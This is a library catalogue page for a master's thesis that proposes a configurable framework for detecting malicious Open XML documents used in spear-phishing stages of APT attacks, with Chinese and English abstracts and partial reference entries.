透過您的圖書館登入
IP:3.234.177.119
  • 學位論文

一個應用於防禦APT攻擊的惡意Open XML文件偵測框架

A Flexible Framework for Malicious Open XML Document Detection against APT Attacks

指導教授 : 孫宏民
若您是本文的作者,可授權文章由華藝線上圖書館中協助推廣。

摘要


進階持續性滲透攻擊(Advanced Persistence Threat) 在近幾年來成為熱門的話題,使得對於進階持續性滲透攻擊的防禦逐漸受到重視。許多大型企業或組織都已經成為APT攻擊的受害者。由於APT攻擊包含了「針對性」、「特殊滲透技巧」、「特殊動機」、「組織性」以及「資金充足」這幾個特徵,因此APT攻擊所帶來的威脅不容忽視。 在APT攻擊的初期感染階段,惡意文件常常會被魚叉式網路釣魚攻擊(Spear Phishing)所使用,對於APT攻擊的早期防禦階段來說,惡意文件的偵測顯得格外的重要。而近幾年來,Open XML 文件格式成為一種新興的惡意文件使用格式,但目前對於惡意文件的偵測研究大多為針對PDF檔案類型或是舊式的OLE Office文件格式所設計,對於惡意Open XML文件的偵測並沒有一個特別設計的偵測框架。 在這篇論文中,我們提出了一個惡意Open XML文件的偵測框架,這個框架依照: 自動化、彈性化以及配置化的原則來做設計,讓此框架可以自動的對Open XML文件做分析並產生包含重點資訊的報告給使用者,並且此框架包含多個針對不同物件的掃描模組(Scanner Module),這些掃描模組的設計可以讓使用者或是研究人員容易的在模組中加入掃描工具或客製化的掃描程式來進行符合需求的自動掃描,而可配置化的設計也可以讓此框架依照不同的掃描需求來做客製化的掃描配置。這些特點讓此框架不只可以用在偵測的工作上,更可以使研究人員的分析工作更加便利。

並列摘要


The defense against Advanced Persistence Threat (APT) attacks is a hot issue in recent years. Many organizations and enterprises even governments have been victims of APT attacks. Since APT attacks have a specific objective and are skillfully crafted, motivated, organized and well founded, they should not be ignored. Malicious documents have always been used with the spear phishing attack in the initial infection phase of an APT attack. The detection of malicious documents is important for an early stage defensive APT attack. In recent years, Open XML has become a popular document format used in the APT attacks. However, the related malicious document detection research is mostly focused on the PDF file or the traditional OLE Office document format. A specific framework design for malicious Open XML document detection does not exist. In this thesis, we propose a malicious Open XML document detection framework. This framework is designed under the principle of: Automatic, Flexible and Configurable. This framework can analyze Open XML document job automatically and generate analysis reports with information highlighting. Also, this framework is flexible since the “Scanner Module” can be configured and it is easy to extend this farmework by adding customized scanners. The “Configurable” framework makes the detection more customizable and can be adjusted to fit different scanning on demand. This framework can not only be used to do the detection work but it can also be used for research purposes.

參考文獻


[20] Peter Likarish, Eunjin (EJ) Jung, and Insoon Jo. Obfuscated malicious
[3] Mandiant. ”apt1: Exposing one of china’s cyber espionage units”. 2013.
[17] Jing-Yao Lin and Hsing-Kuo Pao. Multi-view malicious document detection.
Symposium, 2009.
Malicious shellcode detection with virtual memory snapshots. In INFOCOM,

延伸閱讀